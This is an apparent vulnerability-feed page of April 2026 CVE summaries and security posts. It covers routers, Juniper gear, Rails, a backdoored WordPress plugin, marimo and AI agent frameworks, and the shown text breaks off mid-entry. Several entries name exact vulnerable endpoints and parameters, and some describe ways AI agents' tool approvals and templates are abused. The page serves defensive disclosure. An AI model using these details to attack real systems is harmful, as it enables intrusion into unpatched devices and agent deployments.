Totolink A7100RU (7.4cu.2313_b20191024) hit by CRITICAL OS command injection (CVE-2026-5997) — remote, unauthenticated code execution possible. No patch yet. Disable remote management & limit access! radar.offseq.com/threat/cve-20 #OffSeq #CVE20265997 #RouterSecurity #Vuln

##

CVE-2026-33170
(CVSS UNKNOWN)

EPSS: 0.01%

updated 2026-04-10T01:59:00

2 posts

### Impact

`SafeBuffer#%` does not propagate the `@html_unsafe` flag to the newly created buffer. If a `SafeBuffer` is mutated in place (e.g. via `gsub!`) and then formatted with `%` using untrusted arguments, the result incorrectly reports `html_safe? == true`, bypassing ERB auto-escaping and possibly leading to XSS.

### Releases

The fixed releases are available at the normal locations.

### Cre

vitobotta@mastodon.social at 2026-04-10T21:54:37.000Z ##

CVE-2026-33170 is fascinating because it breaks Rails' own XSS protection system. SafeBuffer#% operator fails to propagate the html_unsafe flag when creating new buffers, so content that should be escaped gets marked as safe.

It's a flaw in the security mechanism itself, not just another injection point. Rails apps using SafeBuffer with the % operator for formatting could be exposing XSS vulnerabilities without realising their protection layer is compromised.

##

CVE-2026-5995
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-10T01:16:42.490000

2 posts

A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Impacted is the function setMiniuiHomeInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument lan_info can lead to os command injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks.

thehackerwire@mastodon.social at 2026-04-10T03:27:46.000Z ##

🔴 CVE-2026-5995 - Critical (9.8)

A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Impacted is the function setMiniuiHomeInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument lan_info can lead to os...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-10T01:30:28.000Z ##

🛑 CRITICAL: CVE-2026-5995 in Totolink A7100RU (7.4cu.2313_b20191024) enables remote, unauthenticated OS command injection via /cgi-bin/cstecgi.cgi. No patch yet — disable remote mgmt & restrict access. radar.offseq.com/threat/cve-20 #OffSeq #Infosec #Vulnerability

##

CVE-2026-35638
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T00:30:38

1 post

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the Control UI that allows unauthenticated sessions to retain self-declared privileged scopes without device identity verification. Attackers can exploit the device-less allow path in the trusted-proxy mechanism to maintain elevated permissions by declaring arbitrary scopes, bypassing device identity requirements.

thehackerwire@mastodon.social at 2026-04-10T05:53:46.000Z ##

🟠 CVE-2026-35638 - High (8.8)

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the Control UI that allows unauthenticated sessions to retain self-declared privileged scopes without device identity verification. Attackers can exploit the device-less al...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5983
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T00:30:38

1 post

A vulnerability was determined in D-Link DIR-605L 2.13B01. This issue affects the function formSetDDNS of the file /goform/formSetDDNS of the component POST Request Handler. Executing a manipulation of the argument curTime can lead to buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This vulnerability only affects products that are

thehackerwire@mastodon.social at 2026-04-10T04:03:25.000Z ##

🟠 CVE-2026-5983 - High (8.8)

A vulnerability was determined in D-Link DIR-605L 2.13B01. This issue affects the function formSetDDNS of the file /goform/formSetDDNS of the component POST Request Handler. Executing a manipulation of the argument curTime can lead to buffer overf...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5982
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T00:30:38

1 post

A vulnerability was found in D-Link DIR-605L 2.13B01. This vulnerability affects the function formAdvNetwork of the file /goform/formAdvNetwork of the component POST Request Handler. Performing a manipulation of the argument curTime results in buffer overflow. Remote exploitation of the attack is possible. The exploit has been made public and could be used. This vulnerability only affects products

thehackerwire@mastodon.social at 2026-04-10T04:03:15.000Z ##

🟠 CVE-2026-5982 - High (8.8)

A vulnerability was found in D-Link DIR-605L 2.13B01. This vulnerability affects the function formAdvNetwork of the file /goform/formAdvNetwork of the component POST Request Handler. Performing a manipulation of the argument curTime results in buf...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5981
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-10T00:30:38

1 post

A vulnerability has been found in D-Link DIR-605L 2.13B01. This affects the function formAdvFirewall of the file /goform/formAdvFirewall of the component POST Request Handler. Such manipulation of the argument curTime leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no long

thehackerwire@mastodon.social at 2026-04-10T04:00:13.000Z ##

🟠 CVE-2026-5981 - High (8.8)

A vulnerability has been found in D-Link DIR-605L 2.13B01. This affects the function formAdvFirewall of the file /goform/formAdvFirewall of the component POST Request Handler. Such manipulation of the argument curTime leads to buffer overflow. The...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5988
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T00:30:38

1 post

A vulnerability was detected in Tenda F451 1.0.0.7. This impacts the function formWrlsafeset of the file /goform/AdvSetWrlsafeset. Performing a manipulation of the argument mit_ssid results in stack-based buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used.

thehackerwire@mastodon.social at 2026-04-10T03:59:52.000Z ##

🟠 CVE-2026-5988 - High (8.8)

A vulnerability was detected in Tenda F451 1.0.0.7. This impacts the function formWrlsafeset of the file /goform/AdvSetWrlsafeset. Performing a manipulation of the argument mit_ssid results in stack-based buffer overflow. The attack can be initiat...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5992
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T00:30:38

1 post

A vulnerability was determined in Tenda F451 1.0.0.7. This affects the function fromP2pListFilter of the file /goform/P2pListFilter. This manipulation of the argument page causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.

thehackerwire@mastodon.social at 2026-04-10T03:45:35.000Z ##

🟠 CVE-2026-5992 - High (8.8)

A vulnerability was determined in Tenda F451 1.0.0.7. This affects the function fromP2pListFilter of the file /goform/P2pListFilter. This manipulation of the argument page causes stack-based buffer overflow. Remote exploitation of the attack is po...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5991
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T00:30:38

1 post

A vulnerability was found in Tenda F451 1.0.0.7. Affected by this issue is the function formWrlExtraSet of the file /goform/WrlExtraSet. The manipulation of the argument GO results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used.

thehackerwire@mastodon.social at 2026-04-10T03:45:25.000Z ##

🟠 CVE-2026-5991 - High (8.8)

A vulnerability was found in Tenda F451 1.0.0.7. Affected by this issue is the function formWrlExtraSet of the file /goform/WrlExtraSet. The manipulation of the argument GO results in stack-based buffer overflow. The attack may be launched remotel...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5989
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T00:30:38

1 post

A flaw has been found in Tenda F451 1.0.0.7. Affected is the function fromRouteStatic of the file /goform/RouteStatic. Executing a manipulation of the argument page can lead to stack-based buffer overflow. The attack can be launched remotely. The exploit has been published and may be used.

thehackerwire@mastodon.social at 2026-04-10T03:28:06.000Z ##

🟠 CVE-2026-5989 - High (8.8)

A flaw has been found in Tenda F451 1.0.0.7. Affected is the function fromRouteStatic of the file /goform/RouteStatic. Executing a manipulation of the argument page can lead to stack-based buffer overflow. The attack can be launched remotely. The ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33778
(7.5 HIGH)

EPSS: 0.06%

updated 2026-04-10T00:30:37

1 post

An Improper Validation of Syntactic Correctness of Input vulnerability in the IPsec library used by kmd and iked of Juniper Networks Junos OS on SRX Series and MX Series allows an unauthenticated, network-based attacker to cause a complete Denial-of-Service (DoS). If an affected device receives a specifically malformed first ISAKMP packet from the initiator, the kmd/iked process will crash and r

thehackerwire@mastodon.social at 2026-04-10T06:11:24.000Z ##

🟠 CVE-2026-33778 - High (7.5)

An Improper Validation of Syntactic Correctness of Input vulnerability in the IPsec library used by kmd and iked of Juniper Networks Junos OS on SRX Series and MX Series allows an unauthenticated, network-based attacker to cause a complete Denial...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33785
(8.8 HIGH)

EPSS: 0.01%

updated 2026-04-10T00:30:37

1 post

A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS on MX Series allows a local, authenticated user with low privileges to execute specific commands which will lead to a complete compromise of managed devices. Any user logged in, without requiring specific privileges, can issue 'request csds' CLI operational commands. These commands are only meant to be executed by high

thehackerwire@mastodon.social at 2026-04-10T06:08:19.000Z ##

🟠 CVE-2026-33785 - High (8.8)

A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS on MX Series allows a local, authenticated user with low privileges to execute specific commands which will lead to a complete compromise of managed devices.

Any user l...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33790
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-10T00:30:37

1 post

An Improper Check for Unusual or Exceptional Conditions vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker sending a specific, malformed ICMPv6 packet to cause the srxpfe process to crash and restart. Continued receipt and processing of these packets will repeatedly crash the srxpfe process and sustain the Denial of Service (DoS) condition. Duri

thehackerwire@mastodon.social at 2026-04-10T06:08:01.000Z ##

🟠 CVE-2026-33790 - High (7.5)

An Improper Check for Unusual or Exceptional Conditions vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker sending a specific, malformed ICMPv6 packet to cause the srxpfe process to crash and res...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33793
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-10T00:30:37

1 post

An Execution with Unnecessary Privileges vulnerability in the User Interface (UI) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker to gain root privileges, thus compromising the system. When a configuration that allows unsigned Python op scripts is present on the device, a non-root user is able to execute malicious op scripts as a root-equivalent user, lea

thehackerwire@mastodon.social at 2026-04-10T05:59:55.000Z ##

🟠 CVE-2026-33793 - High (7.8)

An Execution with Unnecessary Privileges vulnerability in the User Interface (UI) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker to gain root privileges, thus compromising the system.

When a configurat...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35625
(7.8 HIGH)

EPSS: 0.03%

updated 2026-04-10T00:30:37

1 post

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability where silent local shared-auth reconnects auto-approve scope-upgrade requests, widening paired device permissions from operator.read to operator.admin. Attackers can exploit this by triggering local reconnection to silently escalate privileges and achieve remote code execution on the node.

thehackerwire@mastodon.social at 2026-04-10T05:54:06.000Z ##

🟠 CVE-2026-35625 - High (7.8)

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability where silent local shared-auth reconnects auto-approve scope-upgrade requests, widening paired device permissions from operator.read to operator.admin. Attackers can exploit t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35645
(8.1 HIGH)

EPSS: 0.03%

updated 2026-04-10T00:30:37

1 post

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in the gateway plugin subagent fallback deleteSession function that uses a synthetic operator.admin runtime scope. Attackers can exploit this by triggering session deletion without a request-scoped client to execute privileged operations with unintended administrative scope.

thehackerwire@mastodon.social at 2026-04-10T05:00:26.000Z ##

🟠 CVE-2026-35645 - High (8.1)

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in the gateway plugin subagent fallback deleteSession function that uses a synthetic operator.admin runtime scope. Attackers can exploit this by triggering session deletion wi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33788
(7.8 HIGH)

EPSS: 0.02%

updated 2026-04-10T00:30:30

1 post

A Missing Authentication for Critical Function vulnerability in the Flexible PIC Concentrators (FPCs) of Juniper Networks Junos OS Evolved on PTX Series allows a local, authenticated attacker with low privileges to gain direct access to FPCs installed in the device. A local user with low privileges can gain direct access to the installed FPCs as a high privileged user, which can potentially lead

thehackerwire@mastodon.social at 2026-04-10T06:00:17.000Z ##

🟠 CVE-2026-33788 - High (7.8)

A Missing Authentication for Critical Function vulnerability in the Flexible PIC Concentrators (FPCs) of Juniper Networks Junos OS Evolved on PTX Series allows a local, authenticated attacker with low privileges to gain direct access to FPCs insta...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5990
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T00:16:36.363000

1 post

A vulnerability has been found in Tenda F451 1.0.0.7. Affected by this vulnerability is the function fromSafeEmailFilter of the file /goform/SafeEmailFilter. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-04-10T03:45:16.000Z ##

🟠 CVE-2026-5990 - High (8.8)

A vulnerability has been found in Tenda F451 1.0.0.7. Affected by this vulnerability is the function fromSafeEmailFilter of the file /goform/SafeEmailFilter. The manipulation of the argument page leads to stack-based buffer overflow. The attack ma...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-34424
(9.8 CRITICAL)

EPSS: 0.15%

updated 2026-04-09T23:17:00.540000

2 posts

Smart Slider 3 Pro version 3.5.1.35 for WordPress and Joomla contains a multi-stage remote access toolkit injected through a compromised update system that allows unauthenticated attackers to execute arbitrary code and commands. Attackers can trigger pre-authentication remote shell execution via HTTP headers, establish authenticated backdoors accepting arbitrary PHP code or OS commands, create hid

thehackerwire@mastodon.social at 2026-04-10T04:00:03.000Z ##

🔴 CVE-2026-34424 - Critical (9.8)

Smart Slider 3 Pro version 3.5.1.35 for WordPress and Joomla contains a multi-stage remote access toolkit injected through a compromised update system that allows unauthenticated attackers to execute arbitrary code and commands. Attackers can trig...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-10T00:00:38.000Z ##

⚠️ CVE-2026-34424 (CRITICAL): Smart Slider 3 Pro 3.5.1.35 for WordPress/Joomla has embedded malicious code via a compromised update system. Unauth RCE, backdoors, hidden admins, data exfil possible. Remove plugin & monitor. No fix yet. radar.offseq.com/threat/cve-20 #OffSeq #WordPress #Infosec

##

CVE-2026-5984
(8.8 HIGH)

EPSS: 0.02%

updated 2026-04-09T22:16:37.873000

1 post

A vulnerability was identified in D-Link DIR-605L 2.13B01. Impacted is the function formSetLog of the file /goform/formSetLog of the component POST Request Handler. The manipulation of the argument curTime leads to buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supp

thehackerwire@mastodon.social at 2026-04-10T04:03:34.000Z ##

🟠 CVE-2026-5984 - High (8.8)

A vulnerability was identified in D-Link DIR-605L 2.13B01. Impacted is the function formSetLog of the file /goform/formSetLog of the component POST Request Handler. The manipulation of the argument curTime leads to buffer overflow. The attack is p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40154
(9.3 CRITICAL)

EPSS: 0.03%

updated 2026-04-09T22:16:36.503000

2 posts

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI treats remotely fetched template files as trusted executable code without integrity verification, origin validation, or user confirmation, enabling supply chain attacks through malicious templates. This vulnerability is fixed in 4.5.128.

Matchbook3469@mastodon.social at 2026-04-10T23:04:20.000Z ##

🔴 New security advisory:

CVE-2026-40154 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#Cybersecurity #SecurityPatching #HackerNews

##

thehackerwire@mastodon.social at 2026-04-10T04:32:34.000Z ##

🔴 CVE-2026-40154 - Critical (9.3)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI treats remotely fetched template files as trusted executable code without integrity verification, origin validation, or user confirmation, enabling supply chain attacks through m...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40149
(7.9 HIGH)

EPSS: 0.01%

updated 2026-04-09T22:16:35.750000

1 post

PraisonAI is a multi-agent teams system. Prior to 4.5.128, the gateway's /api/approval/allow-list endpoint permits unauthenticated modification of the tool approval allowlist when no auth_token is configured (the default). By adding dangerous tool names (e.g., shell_exec, file_write) to the allowlist, an attacker can cause the ExecApprovalManager to auto-approve all future agent invocations of tho

thehackerwire@mastodon.social at 2026-04-10T04:32:53.000Z ##

🟠 CVE-2026-40149 - High (7.9)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, the gateway's /api/approval/allow-list endpoint permits unauthenticated modification of the tool approval allowlist when no auth_token is configured (the default). By adding dangerous tool...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35639
(8.8 HIGH)

EPSS: 0.20%

updated 2026-04-09T22:16:33.317000

1 post

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the device.pair.approve method that allows an operator.pairing approver to approve pending device requests with broader operator scopes than the approver actually holds. Attackers can exploit insufficient scope validation to escalate privileges to operator.admin and achieve remote code execution on the Node infrastructure.

thehackerwire@mastodon.social at 2026-04-10T05:53:55.000Z ##

🟠 CVE-2026-35639 - High (8.8)

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the device.pair.approve method that allows an operator.pairing approver to approve pending device requests with broader operator scopes than the approver actually holds. At...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-34512
(8.1 HIGH)

EPSS: 0.03%

updated 2026-04-09T22:16:29.757000

1 post

OpenClaw before 2026.3.25 contains an improper access control vulnerability in the HTTP /sessions/:sessionKey/kill route that allows any bearer-authenticated user to invoke admin-level session termination functions without proper scope validation. Attackers can exploit this by sending authenticated requests to kill arbitrary subagent sessions via the killSubagentRunAdmin function, bypassing owners

thehackerwire@mastodon.social at 2026-04-10T06:00:05.000Z ##

🟠 CVE-2026-34512 - High (8.1)

OpenClaw before 2026.3.25 contains an improper access control vulnerability in the HTTP /sessions/:sessionKey/kill route that allows any bearer-authenticated user to invoke admin-level session termination functions without proper scope validation....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33784
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-04-09T22:16:27.820000

1 post

A Use of Default Password vulnerability in the Juniper Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows an unauthenticated, network-based attacker to take full control of the device. vLWC software images ship with an initial password for a high privileged account. A change of this password is not enforced during the provisioning of the software, which can make full

thehackerwire@mastodon.social at 2026-04-10T06:08:10.000Z ##

🔴 CVE-2026-33784 - Critical (9.8)

A Use of Default Password vulnerability in the Juniper Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows an unauthenticated, network-based attacker to take full control of the device.

vLWC software images ship with a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-13914
(8.7 HIGH)

EPSS: 0.03%

updated 2026-04-09T22:16:22.697000

1 post

A Key Exchange without Entity Authentication vulnerability in the SSH implementation of Juniper Networks Apstra allows an unauthenticated, MITM attacker to impersonate managed devices. Due to insufficient SSH host key validation an attacker can perform a machine-in-the-middle attack on the SSH connections from Apstra to managed devices, enabling an attacker to impersonate a managed device and ca

thehackerwire@mastodon.social at 2026-04-10T06:11:33.000Z ##

🟠 CVE-2025-13914 - High (8.7)

A Key Exchange without Entity Authentication vulnerability in the SSH implementation of Juniper Networks Apstra allows an unauthenticated, MITM attacker to impersonate managed devices.

Due to insufficient SSH host key validation an attacker can ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5978
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T21:31:37

1 post

A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected is the function setWiFiAclRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument mode leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used.

thehackerwire@mastodon.social at 2026-04-10T07:07:47.000Z ##

🔴 CVE-2026-5978 - Critical (9.8)

A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected is the function setWiFiAclRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument mode leads to os command ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5977
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T21:31:37

1 post

A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. This impacts the function setWiFiBasicCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument wifiOff can lead to os command injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks.

thehackerwire@mastodon.social at 2026-04-10T07:07:37.000Z ##

🔴 CVE-2026-5977 - Critical (9.8)

A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. This impacts the function setWiFiBasicCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument wifiOff can lead to os comma...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5980
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-09T21:31:37

1 post

A flaw has been found in D-Link DIR-605L 2.13B01. Affected by this issue is the function formSetMACFilter of the file /goform/formSetMACFilter of the component POST Request Handler. This manipulation of the argument curTime causes buffer overflow. The attack may be initiated remotely. The exploit has been published and may be used. This vulnerability only affects products that are no longer suppor

thehackerwire@mastodon.social at 2026-04-10T06:11:43.000Z ##

🟠 CVE-2026-5980 - High (8.8)

A flaw has been found in D-Link DIR-605L 2.13B01. Affected by this issue is the function formSetMACFilter of the file /goform/formSetMACFilter of the component POST Request Handler. This manipulation of the argument curTime causes buffer overflow....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5975
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T21:31:36

1 post

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. The impacted element is the function setDmzCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument wanIdx leads to os command injection. The attack may be performed from remote. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-04-10T07:08:25.000Z ##

🔴 CVE-2026-5975 - Critical (9.8)

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. The impacted element is the function setDmzCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument wanIdx leads to os command inj...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5979
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-09T21:16:13.967000

1 post

A vulnerability was detected in D-Link DIR-605L 2.13B01. Affected by this vulnerability is the function formVirtualServ of the file /goform/formVirtualServ of the component POST Request Handler. The manipulation of the argument curTime results in buffer overflow. The attack can be launched remotely. The exploit is now public and may be used. This vulnerability only affects products that are no lon

thehackerwire@mastodon.social at 2026-04-10T07:07:56.000Z ##

🟠 CVE-2026-5979 - High (8.8)

A vulnerability was detected in D-Link DIR-605L 2.13B01. Affected by this vulnerability is the function formVirtualServ of the file /goform/formVirtualServ of the component POST Request Handler. The manipulation of the argument curTime results in ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5976
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T20:16:29.763000

1 post

A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setStorageCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument sambaEnabled results in os command injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks.

thehackerwire@mastodon.social at 2026-04-10T07:08:35.000Z ##

🔴 CVE-2026-5976 - Critical (9.8)

A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setStorageCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument sambaEnabled results in ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39987
(0 None)

EPSS: 2.70%

updated 2026-04-09T18:17:02.807000

2 posts

marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands. Unlike other WebSocket endpoints (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpo

Nuclei template

beyondmachines1 at 2026-04-11T08:01:09.743Z ##

Marimo Python Notebook RCE Exploited Hours After Disclosure

Marimo patched a critical RCE vulnerability (CVE-2026-39987) that was exploited within 10 hours of disclosure to steal cloud credentials and SSH keys. The flaw allows unauthenticated attackers to gain full interactive shell access via a WebSocket authentication bypass.

**If you're running Marimo notebooks, update to version 0.23.0 immediately and rotate any credentials (AWS keys, SSH keys, database passwords, API secrets) that were stored on or accessible from that system. If you can't update right away, block access to the /terminal/ws endpoint or put the notebook behind a reverse proxy with authentication and never expose notebook platforms directly to the internet.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-04-11T08:01:09.000Z ##

Marimo Python Notebook RCE Exploited Hours After Disclosure

Marimo patched a critical RCE vulnerability (CVE-2026-39987) that was exploited within 10 hours of disclosure to steal cloud credentials and SSH keys. The flaw allows unauthenticated attackers to gain full interactive shell access via a WebSocket authentication bypass.

**If you're running Marimo notebooks, update to version 0.23.0 immediately and rotate any credentials (AWS keys, SSH keys, database passwords, API secrets) that were stored on or accessible from that system. If you can't update right away, block access to the /terminal/ws endpoint or put the notebook behind a reverse proxy with authentication and never expose notebook platforms directly to the internet.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

CVE-2026-39885
(7.5 HIGH)

EPSS: 0.03%

updated 2026-04-09T14:29:54

1 post

## Summary

The `mcp-from-openapi` library uses `@apidevtools/json-schema-ref-parser` to dereference `$ref` pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing `$ref` values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during

thehackerwire@mastodon.social at 2026-04-09T05:00:17.000Z ##

🟠 CVE-2026-39885 - High (7.5)

FrontMCP is a TypeScript-first framework for the Model Context Protocol (MCP). Prior to 2.3.0, the mcp-from-openapi library uses @apidevtools/json-schema-ref-parser to dereference $ref pointers in OpenAPI specifications without configuring any URL...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39891
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-09T14:29:51

2 posts

## Summary

Direct insertion of unescaped user input into template-rendering tools allows arbitrary code execution via specially crafted agent instructions.

## Details

The `create_agent_centric_tools()` function returns tools (like `acp_create_file`) that process file content using template rendering. When user input from `agent.start()` is passed directly into these tools without escaping (as show

thehackerwire@mastodon.social at 2026-04-09T04:35:53.000Z ##

🟠 CVE-2026-39891 - High (8.8)

PraisonAI is a multi-agent teams system. Prior to 4.5.115, the create_agent_centric_tools() function returns tools (like acp_create_file) that process file content using template rendering. When user input from agent.start() is passed directly int...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-09T04:19:59.000Z ##

🟠 CVE-2026-39891 - High (8.8)

PraisonAI is a multi-agent teams system. Prior to 4.5.115, the create_agent_centric_tools() function returns tools (like acp_create_file) that process file content using template rendering. When user input from agent.start() is passed directly int...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39890
(9.8 CRITICAL)

EPSS: 0.29%

updated 2026-04-09T14:29:47

1 post

## Summary

